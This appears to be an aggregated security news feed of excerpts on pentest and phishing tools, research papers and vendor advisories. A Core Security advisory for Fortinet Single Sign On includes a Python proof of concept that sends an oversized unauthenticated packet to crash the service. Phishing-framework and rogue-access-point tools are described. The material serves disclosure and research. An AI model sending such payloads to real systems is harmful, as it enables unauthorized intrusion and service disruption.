Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

cSploit

$
0
0
cSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

Once cSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation, etc, etc .

This application is still in beta stage, a stable release will be available as soon as possible, but expect some crash or strange behaviour until then,

more here...........https://github.com/cSploit/android

Cartero

$
0
0
A robust Phishing Framework with a full featured CLI interface. The project was born out necessity through of years of engagements with tools that just didn't do the job. Even though there are many projects out there, we were not able to find a suitable solution that gave us both easy of use and customizability.

Cartero is a modular project divided into commands that perform independent tasks (i.e. Mailer, Cloner, Listener, AdminConsole, etc...). In addition each sub-command has repeatable configuration options to configure and automate your work.

more here.......https://github.com/Section9Labs/Cartero

KARMA ROGUE ACCESSPOINT OFFENSE WITH BADKARMA.PY

$
0
0
For those that don’t know, karma is a patch that is applied to hostapd which allows the creation of a wifi honeypot. This honeypot listens for probe requests from devices which announce SSIDs used to autojoin preferred wifi hotspots. The honeypot then spoofs this SSID, luring in unsuspecting devices. Once on the network, many nasty methods can be used to attempt to compromise the device itself, or the data which traverses the access point.

more here.........http://atechdad.com/karma-rogue-accesspoint-offense-with-badkarma-py/

The Reports of Passwords’ Demise Have Been Greatly Exaggerated

$
0
0
Passwords suck. We cannot remember them. We dread having to type them. We struggle with safeguarding them. Yet, passwords are so ubiquitous, it’s hard to get rid of them. Judging by the frequency with which we to continue to rely on passwords, the reports of their demise have been greatly exaggerated. However, the manner in which we use passwords is rapidly changing for the better, improving upon both convenience and security.

more here........https://zeltser.com/passwords-demise-exaggerated/

Paper- JMD: A Hybrid Approach for Detecting Java Malware

$
0
0
Abstract
With the rapid rise in the number of exploits targeting
the Java runtime environment, new tools are required
to detect these malicious Java applications. This paper
proposes one such tool, the Java Malware Detector
(JMD). JMD takes a hybrid approach that combines
symbolic execution, instrumentation and dynamic
analysis to detect malware that subverts Java’s
access control mechanisms. Using this approach, we
aim to derive any trigger conditions that may exist
before instrumenting and executing the malware in
a controlled environment to observe whether it escapes
the Java security sandbox. A key element of
this approach is our use of existing open-source software
platforms—specifically, Java Pathfinder and AspectJ.
By using real-world Java malware samples we
are able to evaluate the effectiveness of JMD. The results
of this evaluation show that JMD’s instrumentation
and dynamic analysis capabilities provide an
effective tool for detecting a wide range of Java malware:
we successfully detected malware variants that
represent fourteen of the known access control-related
CVEs disclosed over the past four years. However, our
success in using symbolic execution to derive trigger
conditions was limited, mainly due to the incomplete
state of the String handling implementation in Java
Pathfinder’s symbolic execution plugin

more here..........http://crpit.com/confpapers/CRPITV161Herrera.pdf

New VMCloak Version 0.2: Windows 7 Support

$
0
0
A couple of months ago I released the first version of VMCloak, now it’s time for version 0.2. VMCloak is a tool for automatically creating and configuring Virtual Machines for Cuckoo Sandbox.

more here.........http://jbremer.org/vmcloak2/

Investigating Skype cloud based media_cache/image sharing with the Forensic Browser for SQLite

$
0
0
Skype recently introduced cloud based operation and started moving away from peer-to-peer messaging with a view, to paraphrase Skype, of improving the service that we receive.

Without going into the pros and cons of this, from a forensic point of view it is irrelevant anyway, the move has had the effect of introducing a new set of artefacts and in particular a new location for stored/cached image files

more here.....http://sandersonforensics.com/forum/content.php?223-Investigating-Skype-cloud-based-media_cache-image-sharing-with-the-Forensic-Browser-for-SQLite

PDF: Evolution of Exploit Kits

$
0
0
Exploring Past Trends and Current Improvements
more here.....http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-evolution-of-exploit-kits.pdf

Paper: The Spy in the Sandbox – Practical Cache Attacks in Javascript

$
0
0
Abstract
We present the first micro-architectural side-channel attack
which runs entirely in the browser. In contrast to
other works in this genre, this attack does not require the
attacker to install any software on the victim’s machine –
to facilitate the attack, the victim needs only to browse
to an untrusted webpage with attacker-controlled content.
This makes the attack model highly scalable and extremely
relevant and practical to today’s web, especially
since most desktop browsers currently accessing the Internet
are vulnerable to this attack. Our attack, which is
an extension of the last-level cache attacks of Yarom et
al. [23], allows a remote adversary recover information
belonging to other processes, other users and even other
virtual machines running on the same physical host as
the victim web browser. We describe the fundamentals
behind our attack, evaluate its performance using a high
bandwidth covert channel and finally use it to construct a
system-wide mouse/network activity logger. Defending
against this attack is possible, but the required countermeasures
can exact an impractical cost on other benign
uses of the web browser and of the computer.

more here.........http://arxiv.org/pdf/1502.07373v2.pdf

Security Audit Notes: OpenSSL d1_srvr.c Overflow - Advanced Information Security

$
0
0
-=[ Advanced Information Security Corporation ]=-

------------------------------------------------------------------------

Author: Nicholas Lemonias
Type: Security Audit Notes
Date: 17/3/2015
Email: lem.nikolas (at) gmail (dot) com
Audit: OpenSSL v1.0.2 (22nd of January, 2015 Release)
------------------------------------------------------------------------


Introduction
==========
During a source-code audit of the OpenSSL v1.0.2 implementation for
Linux; conducted internally by the Advanced Information Security
Group, instances of deprecated function use, were observed.
An insecure memcpy() is utilized; where a destination buffer, a
source buffer, and the number of bytes to copy are accepted by the
called function.

It is pertinent to note, that the memcpy() function does not check
for a potential overflow of the receiving memory area in this
instance, and no custom security validation controls are in place. [1]
[2]

Software Overview
===============
OpenSSL is an open-source implementation of the SSL and TLS protocol.
The core library is written in the C Language, and implements basic
cryptographic functions, and
also provides various utility functions. Implementation versions are
available for most UNIX-like operating systems (including
Solaris,Linux, Mac OS X and the various open-source BSD operating
systems), OpenVMS and Microsoft Windows. IBM provides a port for the
System i (OS/400). OpenSSL is based on SSLeay by Eric Andrew Young and
Tim Hudson, development of which unofficially ended on December 17,
1998, when Young and Hudson both started to work for RSA Security.

Vulnerability
===============

(1) Deprecated function use / Insecure memcpy() utilization.


The insecurity stems from the lack of any bounds-checking of the
called memcpy function. The memcpy function permits the "peer's"
cookie length, to overlap buffers.

The provided buffer (s->d1->cookie) is for the user-app to fill in;
however, a custom user application could provide an overlong cookie to
exceed it's buffer, and to overflow beyond and into other volatile
memory locations.

Therefore any security is purely on the basis of trust that the remote
peer will not act contrary to protocol, and that the user app is
trusted not to abuse functionality.


PoC - Code Snippet
========================
(.../openssl/ssl/d1_srvr.c)

{ Lines 918 - 942 }


int dtls1_send_hello_verify_request(SSL *s)
{
unsigned int msg_len;
unsigned char *msg, *buf, *p;

if (s->state == DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A) {
buf = (unsigned char *)s->init_buf->data;

msg = p = &(buf[DTLS1_HM_HEADER_LENGTH]); //buf is equal to 12
/* Always use DTLS 1.0 version: see RFC 6347 */
*(p++) = DTLS1_VERSION >> 8;
*(p++) = DTLS1_VERSION & 0xFF;

if (s->ctx->app_gen_cookie_cb == NULL ||
s->ctx->app_gen_cookie_cb(s, s->d1->cookie,
&(s->d1->cookie_len)) == 0) {
SSLerr(SSL_F_DTLS1_SEND_HELLO_VERIFY_REQUEST,
ERR_R_INTERNAL_ERROR);
return 0;
}

*(p++) = (unsigned char)s->d1->cookie_len;
memcpy(p, s->d1->cookie, s->d1->cookie_len);
// Cookie_len is provided by a callback function above - and where,
input is // provided by the user-app.

p += s->d1->cookie_len;
msg_len = p - msg;


Appendices
==========
Sincere Thanks to the OpenSSL team for their feedback.


References
==========
[1] Oracle (2015). Basic Library Functions - Title: memcpy() man pages [Online]
Available at: https://docs.oracle.com/cd/E19683-01/816-0213/6m6ne386d/index.html
[Last Accessed 17 Mar. 2015]

[2] M. Howard, D. LeBlanc Writing Secure Code, Second Edition Microsoft Press

Remote administration trojan using Baidu Cloud Push service

$
0
0
I recently discovered a remote administration trojan (RAT), there is nothing interesting about it but what is is that it is the first one I saw that communicates with server through Baidu Cloud Push notifications.
Baidu Cloud Push service is similar to Google Cloud Messaging (GCM) it allows you to send data from your server to your users' Android-powered device, and also to receive messages from devices on the same connection. Looks like this trojan is the first one discovered using it this technique, unlike GCM that was first used in malicious applications in 2013 detected by Kaspersky lab.


more here........http://b0n1.blogspot.com/2015/03/remote-administration-trojan-using.html

openssl

$
0
0
OpenSSL fix to "prevent handshake with unseeded PRNG"  here.....https://github.com/openssl/openssl/commit/e1b568dd2462f7cacf98f3d117936c34e2849a6b

A Finnish man created this simple email account - and received Microsoft's security certificate

$
0
0
A Finnish IT professional was able to obtain an HTTPS certificate for the Finnish version of Microsoft's Windows Live service simply by asking for it.

The browser-trusted certificate authority Comodo was fooled by an e-mail address that should not have been given to a normal user in the first place.

more here........http://www.tivi.fi/Kaikki_uutiset/2015-03-18/A-Finnish-man-created-this-simple-email-account---and-received-Microsofts-security-certificate-3217662.html

Websense Data Security DLP incident Forensics Preview is vulnerable to Cross-Site Scripting & Additional Advisories From Securify as Knowledge is Power

$
0
0
------------------------------------------------------------------------
Websense Data Security DLP incident Forensics Preview is vulnerable to
Cross-Site Scripting
------------------------------------------------------------------------
Han Sahin, September 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Users of Websense Data Security that are reviewing DLP incidents can be
attacked via Cross-Site Scripting. This issue can be exploited using a
specially crafted email, or by sending a specially crafted HTTP request
through the Websense proxy. The attacker-supplied code can perform a
wide variety of attacks, such as stealing session tokens, login
credentials, performing arbitrary actions as victims, or logging
victims' keystrokes.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Websense created a workaround to address this issue. System -> Reporting
-> Secure forensics with plain-text

A permanent fix will be included in Websense TRITON APX version 8.1,
scheduled to be release in August, 2015.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20140904/websense_data_security_dlp_incident_forensics_preview_is_vulnerable_to_cross_site_scripting.html


and additional vuln advisories added detals here.......https://www.securify.nl/advisories.html

Doc: IBM X-Force Threat Intelligence Quarterly, 1Q 2015

$
0
0
When we look back in history to review and understand the
past year, you can be assured it will be remembered as a year of
significant change.
In early January 2014, companies large and small scrambled to
better understand and analyze a major retail breach that left
them asking whether or not their own security measures would
survive the next storm. Before spring was barely in motion, we
had our first taste of the “designer vuln”—a critical
vulnerability that not only proved lethal for targeted attacks,
but also had a cleverly branded logo, website and call-name (or
handle) that would forever identify the disclosure.

more here..........http://public.dhe.ibm.com/common/ssi/ecm/wg/en/wgl03073usen/WGL03073USEN.PDF

XSS via a spoofed React element

$
0
0
In late February 2015, I reported an XSS vulnerability in HackerOne itself. This one took advantage of the way the arguments passed to React functions were being validated, tricking React into thinking it was rendering a React element instead of the string that was expected.

At the request of HackerOne, the report was publicly disclosed today.

more here............http://danlec.com/blog/xss-via-a-spoofed-react-element

[CORE-2015-0006] - Fortinet Single Sign On Stack Overflow

$
0
0
1. Advisory Information


Title: Fortinet Single Sign On Stack Overflow
Advisory ID: CORE-2015-0006
Advisory URL: http://www.coresecurity.com/advisories/fortinet-single-sign-on-stack-overflow
Date published: 2015-03-18
Date of last update: 2015-03-18
Vendors contacted: Fortinet
Release mode: Coordinated release


2. Vulnerability Information


Class: Stack-based Buffer Overflow [CWE-121]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2281



3. Vulnerability Description


Through Fortniet [1] "Single Sign On" or "Single User Sign On" users logged on to a computer network are authenticated for access to network resources through the FortiGate unit without having to enter their username and password again. Fortinet Single Sign On (FSSO) provides Single Sign On capability for Microsoft Windows networks using either Active Directory or NTLM authentication and Novell networks, using eDirectory.

FSSO [4] monitors user logons and sends the FortiGate unit the username, IP address, and the list of Windows AD user groups to which the user belongs. When the user tries to access network resources, the FortiGate unit selects the appropriate security policy for the destination. If the user belongs to one of the permitted user groups, the connection is allowed.

There is a vulnerability in the message dispatcher used by FSSO Windows Active Directory and FSSO Novell eDirectory. Exploitation of this vulnerability might lead to a full network compromise.


4. Vulnerable packages


 - FSSO Windows Active Directory 4.3.0161 (4.3.0151, 4.3.0129 were also tested and found vulnerable)
 - FSSO Novell eDirectory 4.3.0161

Other versions are probably affected too, but they were not checked.


5. Vendor Information, Solutions and Workarounds


Core Security recommends those affected use third party software such as Sentinel [3] or EMET [2] that could help to prevent the exploitation of affected systems to some extent.

Fortinet published the following FortiGuard Bulletin: [5]


6. Credits


This vulnerability was discovered and researched by Enrique Nissim in collaboration with Andres Lopez Luksenberg, both from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.



7. Technical Description / Proof of Concept Code


[CVE-2015-2281] The vulnerability in both cases can be exploited by sending a special packet to the services without being authenticated (pre-auth).

Given that both software systems require and Administrative account in order to run, (Windows Domain Admin or eDirectory Admin accordingly) the full network is exposed. Pre-authenticated Remote Code Execution with Domain Administrative rights is possible.

The vulnerability is located in the Message Dispatcher for message PROCESS_HELLO. Here is a PoC (Proof of Concept) that causes the application thread with the FortiGate appliance to crash:


import socket
import struct

TARGET_IP = "192.168.233.100"

def play():

    message = "\x80\x01\x42\x42"
    buff = "A"*248
    buff += "B" * (0xfffff - len(buff))
    payload = struct.pack(">I", 0x000fffff) + message + buff

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, 8000))
    s.send(payload)
    buff_recv = s.recv(6000)
    print buff_recv
    s.close()

play()


8. Report Timeline


2015-01-07: Core Security notifies Fortinet of the vulnerabilities. Publication date is set for February 2nd, 2015.
2015-01-09: Fortinet requests a copy of the advisory draft.
2015-01-09: Core Security sends a draft copy of the advisory to the vendor.
2015-01-14: Fortinet informs they are in the process of validating the report and asks if we want to commit to responsible disclosure.
2015-01-14: Core Security informs the vendor that our policy is to publish our findings in order to help the users to gain awareness of the issues and therefore allowing them to take the necessary precautions to protect themselves. We informed them that we always try to release our findings in a coordinate manner provided that the time the vendor takes to test and fix the issue is reasonable and the publication of this solution and our disclosure is agreed between the two parties.
2015-01-21: Core Security asks the vendor if they were able to review the vulnerabilities and a tentative date for publishing the fix and consequently the advisory.
2015-01-27: Fortinet acknowledges the vulnerabilities and informs that a fix of the source code is in order. The say they'll keep us updated regarding the release schedule.
2015-02-24: Fortinet informed us that the current ETA was the first week of March, but that it could be changed depending on their engineering load.
2015-02-24: Core Security requested a specific date considering that the first week of March was next week.
2015-02-27: Fortinet informed us that they currently don't have a fixed date. Additionally they sent us the link where their FortiGuard Bulletin is going to be published. They requested the CVE ID we are going to assign this issue.
2015-03-05: Core Security informs Fortinet that we still don´t have a CVE ID to share with them because we haven't received one from Mitre yet.
2015-03-05: Fortinet informed us that they were discussing when they were going to release the fix/update, and that they will provide us an ETA tomorrow.
2015-03-06: Fortinet informed us that their new ETA is March 11th, 2015. They clarify this is not a fixed date.
2015-03-11: Fortinet informed us that they postponed to the end of the week or next week the ETA of FortiOS 5.2.3.
2015-03-13: Core Security asks Fortinet about the status of the ETA for the fix/update. Additionally we recommended not to release it on a Friday in order to give the affected users the required time to apply the fix.
2015-03-16: Core Security asks Fortinet if they could send us their estimated ETA for the fix/update.
2015-03-16: Fortinet informed us that the current ETA is March 17th or March 18th.
2015-03-18: Advisory CORE-2015-0006 published.


9. References


[1] http://www.fortinet.com/.
[2] http://support.microsoft.com/kb/2458544.
[3] https://github.com/CoreSecurity/sentinel.
[4] http://docs-legacy.fortinet.com/cb/html/index.html#page/FOS_Cookbook/Authentication/FSSO-IBP.html.
[5] http://www.fortiguard.com/advisory/FG-IR-15-006/.


10. About CoreLabs


CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.


11. About Core Security


Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.


12. Disclaimer


The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. PGP/GPG Keys


This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Windows Source Code on GitHub!

$
0
0
OK, well, maybe that title was a bit misleading. But, it’s not entirely untrue: portions of the Kernel and User Mode Driver Frameworks are going to be available on GitHub for the benefit of the driver development community. The magnitude of this announcement cannot be understated as it represents a major paradigm shift in Microsoft’s engagement with the development community.

more here...........https://www.osr.com/blog/2015/03/18/windows-source-code-now-github/

AeroFS is now free up to 30 users

$
0
0
AeroFS is an on-premises, fast, and secure file sync and share tool for businesses. Think Dropbox, but completely behind your corporate firewall.

more here........https://www.aerofs.com/blog/aerofs-is-now-free-up-to-30-users/

MANUALLY REMOVING THE PASSWORD FROM MALICIOUS VBA PROJECTS

$
0
0
Malicious actors are always looking for a way to deliver their malware to their targets. Recently, they have resorted to distributing malicious Office documents containing VBA macros. This method is often effective because all the user needs to do is click “Enable Macros” displayed in the document and code execution is achieved. They often rely on social engineering in order to persuade the target to run the macro. For example, a recent campaign has revealed that the authors will have the document display “encrypted” text. It will then ask the user to click “Enable Macros” in order to decrypt it. Once the macro is ran, it hides the “encrypted” text and then reveals actual readable text.

more here......https://enigma0x3.wordpress.com/2015/03/18/removing-the-password-from-malicious-vba-projects/
Viewing all 8064 articles
Browse latest View live